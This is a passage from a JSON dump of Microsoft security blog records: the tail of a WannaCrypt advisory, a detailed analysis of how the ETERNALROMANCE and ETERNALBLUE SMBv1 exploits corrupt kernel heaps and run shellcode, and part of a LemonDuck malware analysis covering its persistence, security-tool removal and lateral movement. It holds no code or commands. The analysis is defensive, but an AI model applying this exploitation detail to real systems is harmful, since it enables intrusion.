x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 
x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nCustomer guidance for WannaCrypt attacks: <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\n## Indicators of compromise\n\nSHA1 of samples analyzed:\n\n * 51e4307093f8ca8854359c0ac882ddca427a813c\n * e889544aff85ffaf8b0d0da705105dee7c97fe26\n\nFiles created:\n\nRegistry keys created:\n\n * HKLM\\SOFTWARE\\WanaCrypt0r\\wd\n\n \n\n \n\n_Karthik Selvaraj, Elia Florio, Andrea Lelli, and Tanmay Ganacharya ([@tanmayg](<https://twitter.com/tanmayg>))_ \n_Microsoft Malware Protection Center ([@msftmmpc](<https://twitter.com/msftmmpc>))_\n\n \n\nRelated blog entries:\n\n[Windows 10 Creators 
Update provides next-gen ransomware protection](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)\n\n[Analysis of the ETERNALBLUE and ETERNALROMANCE exploits leaked by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\n\n \n\nUpdates:\n\nJune 20, 2017 - added reference to analysis of exploits leaked by Shadow Brokers", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-13T06:40:39", "title": "WannaCrypt ransomware worm targets out-of-date systems", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0145"], "modified": "2017-05-13T06:40:39", "href": "https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/", "id": "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-30T15:02:19", "description": "\n\nOn April 14, a group calling 
themselves the Shadow Brokers caught the attention of the security community by [releasing a set of weaponized exploits](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>). Shortly thereafter, one of these exploits was used to create wormable malware that we now know as [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>), which targeted a large number of out-of-date systems and held encrypted files for ransom.\n\nAlthough the exploits are ineffective on newer platforms or attempt to take advantage of already patched vulnerabilities, they nevertheless provide an opportunity to analyze and evaluate whether the exploitation techniques used are still viable on Windows 10 systems with Creators Update.\n\nIn Windows 10, key security enhancements such as kernel Address Space Layout Randomization ([kASLR](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>)), kernel Data Execution Prevention ([DEP](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>)), and virtualization-based security (VBS) capabilities delivered with [Device Guard](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/deploy-device-guard-enable-virtualization-based-security>) all contribute to breaking the exploit techniques observed in the wild. Through VBS\u2019s usage of CPU hypervisor functionality, Device Guard-enabled systems can verify and enforce integrity of code that's mapped in the kernel address space. Alongside Device Guard is the new kernel [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) (kCFG) introduced with Windows 10 Creators Update. 
kCFG prevents many exploitation techniques that rely on corrupting function pointers to achieve code execution.\n\nIn this blog, we provide an in-depth analysis of two of the exploits released by the Shadow Brokers. Both exploits allow arbitrary code execution through vulnerabilities in the Server Message Block (SMBv1) file-sharing server implementation.\n\nWe follow with a discussion about how Device Guard and kCFG prevent these exploits\u2014and many other exploits\u2014from installing backdoor implants in kernel memory.\n\n## The exploit kit\n\nThe kit\u2019s directory structure shows a modular exploitation framework, where payloads are kept separate from exploits.\n\n\n\n_Figure 1. Exploit kit directory structure_\n\nAll the binaries in the kit contain multiple strings that describe their purpose. Furthermore, the kit exports common functionality to DLL files, revealing additional information through referenced function names. While the strings and the function calls were not necessary for us to examine the kit, both helped speed up our initial analysis.\n\nFor more information about the individual exploits in the kit that targeted Microsoft products, refer to the [blog post from Microsoft Security Response Center](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>).\n\n## ETERNALROMANCE SMB exploit\n\nLet\u2019s dig into the guts of one of the exploits in the kit.\n\nETERNALROMANCE is a remote code execution (RCE) exploit against the legacy SMBv1 file sharing protocol. It takes advantage of [CVE-2017-0145](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>), which has been patched with the [MS17-010 security bulletin](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>). One might note that file sharing over SMB is normally used only within local networks and that the SMB ports are typically blocked from the internet at the firewall. 
However, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise.\n\nThis exploit was written to remotely install and launch an SMB backdoor. At the core of this exploit is a _type confusion_ vulnerability leading to an _attacker offset controlled_ arbitrary heap write. As with almost any _heap corruption_ exploit, the attacker must know or control the layout of the heap to consistently succeed. With SMB, most objects are allocated in the non-paged pool.\n\n### Getting a reliable heap layout\n\nThe exploit begins to spray the heap by starting several concurrent instances of [SMB_COM_TRANSACTION](<https://msdn.microsoft.com/en-us/library/ee441489.aspx>). The exploit binary supports three different heap spray methods, allowing it to deal with varying pool behaviors between Windows versions. Apart from the first few allocations (the exact number depends on the pool state), transaction objects are allocated with a fixed, predictable displacement from each other. After the spray has finished, the exploit uses an info leak in a _TRANS_PEEK_NMPIPE_ transaction. It uses the info leak to determine whether the target is running a 32- or 64-bit version of Windows and to get kernel pointers for various SMB objects.\n\nA network trace can quickly visualize what's going on:\n\n\n\n_Figure 2. Network packet containing leaked pool memory_\n\n### Building primitives from heap corruption\n\nThe spray has placed many _TRANSACTION_ objects on the heap at a known distance from each other. And because the exploit has leaked the size of a pointer, it knows the offsets to all fields in the _TRANSACTION_ object. 
The exploit can now\u2014using carefully crafted offsets\u2014use the _type confusion out-of-bounds write_ from one object to corrupt an adjacent one.\n\nBy overwriting the ID associated with the victim object with a hardcoded number (zero), the exploit can now refer to the object without knowing what the original ID was.\n\n\n\n_Figure 3. Heap layout after the spray_\n\nThe exploit proceeds to corrupt the transaction structure in a variety of ways, constructing arbitrary read-write (RW) primitives. It writes additional fields to prevent the transaction from being freed when consumed, allowing the exploit to continue reusing the same transaction for multiple requests without having to pick a new target object to corrupt.\n\n\n\n_Figure 4. InData pointer observed in WinDbg being overwritten by heap out-of-bounds write_\n\n### Installing in-memory backdoor\n\nAt this point, the exploit code attempts to plant backdoor code inside the SMB driver. This step consists of copying shellcode into the non-paged pool, corrupting a function pointer to point to the shellcode and having that function pointer executed. Note that starting with Windows 8, SMB has moved to using non-executable pools, rendering this method ineffective on newer platforms.\n\nTo find a good spot for the function pointer, the exploit follows a pointer on the heap to reach the data segment. Scanning the data segment, it proceeds to look for a table of function pointers that is used to dispatch different _SMB_COM_TRANSACTION2_ subcommands to different functions.\n\nWhen it finds the table of function pointers, the exploit overwrites the 14th entry on this table, which corresponds to the _TRANS2_SESSION_SETUP_ subcommand. 
[MSDN documentation](<https://msdn.microsoft.com/en-us/library/ee441654.aspx>) describes this subcommand as reserved, making it an ideal candidate for triggering the backdoor as it is almost never present in SMB traffic.\n\nWhenever an SMB packet is sent with this subcommand ID to the target device, the function pointer gets executed, triggering the shellcode. This mechanism and the backdoor code are not persistent\u2014they require a persistent second-stage component to survive a reboot.\n\n\n\n_Figure 5. Decompiled code for planting the backdoor_\n\n## ETERNALBLUE SMB exploit\n\nThe WannaCrypt malware spreads by using an adapted version of the ETERNALBLUE exploit. This bug, which targets a different SMBv1 vulnerability, is a linear buffer overrun on the pool.\n\nThe bug occurs in a special case when converting a list of [extended attributes](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff545793\\(v=vs.85\\).aspx>) (EA) from one format to another. If the list contains an EA entry that goes outside the packet buffer, the list is truncated as if it only included up to the last valid entry.\n\nWhen updating the length of the list, the size is written to as if it were a 16-bit ushort, when it is actually a 32-bit ulong. This means that the upper 16-bits are not updated when the list gets truncated:\n\n\n\n_Figure 6. Size of list of extended attributes_ (EA)\n\nThe code allocates a buffer with a size calculated to fit all EA entries up to the truncation. But as the list size was increased, this leads to a linear heap overflow with attacker controlled data.\n\nIn a similar way as before, heap is sprayed but this time with _srvnet!SRVBUFFER_ objects using the SMBv2 protocol. This object contains two key pointers that they target: an [MDL](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff554414\\(v=vs.85\\).aspx>) pointer that receives network packet payload and a pointer to a _srvnet!SRVNET_CONNECTION_ object. 
Both pointers are overwritten so that they point to fixed addresses in the HAL region (used by the _hardware abstraction layer_).\n\nBecause of the corrupted MDL pointer, the next packet payload will get written to the HAL region. This payload contains shellcode and initializes the memory structure for a fake _srvnet!SRVNET_CONNECTION_ object. The connection object has a pointer to a srvnet!_SRVNET_CLIENT_CONNECTION_DISPATCH_ structure that contains function pointers.\n\nAfter the packet payload has been received, the _SRVNET_RECEIVE_HANDLER_ function pointer is executed from the attacker-controlled srvnet!_SRVNET_CLIENT_CONNECTION_DISPATCH_ structure, jumping to the shellcode.\n\nOn Windows 7, which is the system that the exploit targets, the HAL region is mapped as readable, writable, and executable. On newer systems the HAL region is no longer executable, meaning that the CPU would fault when trying to execute the shellcode. Furthermore, the HAL region and other kernel regions (such as page tables) have been randomized on the latest 64-bit versions of Windows 10, breaking assumptions of the 64-bit version in the ETERNALBLUE exploit.\n\n\n\n_Figure 7. Annotated contents of the HAL region with the fake srvnet!SRVNET_CONNECTION object_\n\n## Mitigation with virtualization-based security\n\nVirtualization-based security (VBS) provided with Device Guard on Windows 10 and kCFG enhancements with Creators Update stop common exploitation techniques, including those utilized by ETERNALROMANCE and ETERNALBLUE.\n\n### Stopping shellcode execution with W^X enforcement\n\nOn systems that have [Device Guard VBS enabled](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/deploy-device-guard-enable-virtualization-based-security>), writing and then executing shellcode\u2014such as the ETERNALROMANCE backdoor\u2014in the kernel is not possible due to W^X enforcement policies in the hypervisor. 
These policies ensure that a kernel memory page is never both writable and executable at any given time.\n\nEven if an attacker tries to attack page tables, the hypervisor is still able to force the _execute-disable_ bit through [extended page tables (EPT)](<https://software.intel.com/sites/default/files/managed/2b/80/5-level_paging_white_paper.pdf>). This in turn forces attackers to rely on code-reuse methods, such as return-oriented programming (ROP). As a consequence, the shellcode implant library in the Shadow Brokers release is fundamentally incompatible with VBS-protected systems.\n\n### Preventing use of corrupt function pointers with kCFG\n\nIn [Windows 10 Creators Update](<https://www.microsoft.com/en-US/windows/features>), we introduced a new security mitigation in the kernel space for VBS-enabled systems. The kernel is now compiled with [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) (CFG)\u2014a control flow integrity solution designed to prevent common stack-pivoting techniques that rely on corrupt function pointers or C++ virtual method tables.\n\nControl Flow Guard in the compiled kernel (also known as _kCFG_) aims to verify all indirect call targets before invoking them. This makes it harder for an attacker to execute code by abusing function pointers or other indirect calls.\n\nIn the case of the ETERNALROMANCE exploit, the subverted function pointer would lead to a security fault when invoked, making the exploit non-functional in its current form. The same applies for ETERNALBLUE, which also relies on a corrupted function pointer to achieve code execution.\n\n\n\n_Figure 8. 
With kCFG enabled, the function pointer is now verified by __guard_dispatch_icall_ptr_\n\nOn early Windows 10 systems before Creators Update and without Device Guard, it is possible to attack the page tables of the HAL region to turn it executable and gain code execution using the ETERNALBLUE exploit technique.\n\n## Secure computing with Windows 10 Creators Update\n\nWhile we actively provide patches for vulnerabilities in services like SMBv1, we strive to deliver more and more system-wide mitigations that proactively protect our users from current, as well as future, exploitation and attack methods.\n\nCustomers who run Windows 10 Creators Update benefit from [Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide>) and security enhancements like kCFG and W^X. They also benefit from a [host of other security features](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-security>) that have been strengthened with Windows 10 Creators Update, including:\n\n * [Windows Defender Antivirus](<https://www.microsoft.com/en-us/windows/windows-defender>) for endpoint antimalware protection powered by the Microsoft Intelligent Security Graph, which learns from [billions of devices worldwide](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>)\n * [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) enables enterprises to detect breach activity early and respond fast; try it for free with Windows 10 Enterprise\n * [Microsoft Edge](<https://www.microsoft.com/en-au/windows/microsoft-edge>) is a proven fast browser secured by virtualization and by Windows Defender SmartScreen\n\n### Reducing exposure to SMBv1 exploits on older platforms\n\nMicrosoft strongly advises customers to apply all available security updates in a timely manner. 
To reduce the attack surface on your network, block inbound SMB traffic at the firewall and, if possible, [disable the SMBv1 compatibility driver](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>).\n\n \n\n_**Viktor Brange**_ \n_ Windows Offensive Security Research Team_", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-16T18:17:03", "title": "Analysis of the Shadow Brokers release and mitigation with Windows 10 virtualization-based security", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0145"], "modified": "2017-06-16T18:17:03", "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/", "id": "MMPC:C211C70545FBDF88C2F99362DC4608A8", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-08-13T21:41:38", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. 
[Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. 
LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. 
This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. 
This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. 
This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. 
These domains use a variety of names such as the following:\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN_ (used for lateral movement and privilege escalation)\n * _KR.BIN_ (used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. 
If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. 
It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. 
If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continue long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. 
Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. 
